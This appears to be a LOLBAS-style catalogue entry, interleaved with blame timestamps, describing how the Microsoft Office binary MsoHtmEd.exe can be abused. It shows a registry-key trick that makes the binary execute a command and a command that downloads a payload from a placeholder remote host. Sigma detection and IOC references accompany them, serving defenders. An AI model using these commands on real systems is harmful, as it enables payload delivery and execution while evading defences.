2022-10-04 18:13:56 +07:00
---
Name : MsoHtmEd.exe
Description : Microsoft Office component
Author : Nir Chako
Created : 2022-07-24
Commands :
2023-05-07 14:25:29 +07:00
- Command : MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
Description : Execute a command line from the registry
Usecase : Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
Category : Execute
Privileges : User
MitreID : T1218
OperatingSystem : Windows 10, Windows 11
2022-10-04 18:13:56 +07:00
- Command : MsoHtmEd.exe https://example.com/payload
Description : Downloads payload from remote server
Usecase : It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category : Download
Privileges : User
MitreID : T1105
OperatingSystem : Windows 10, Windows 11
Full_Path :
- Path : C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection :
2022-12-29 15:51:15 +01:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
2022-10-04 18:13:56 +07:00
- IOC : Suspicious Office application internet/network traffic
Acknowledgement :
- Person : Nir Chako (Pentera)
Handle : '@C_h4ck_0'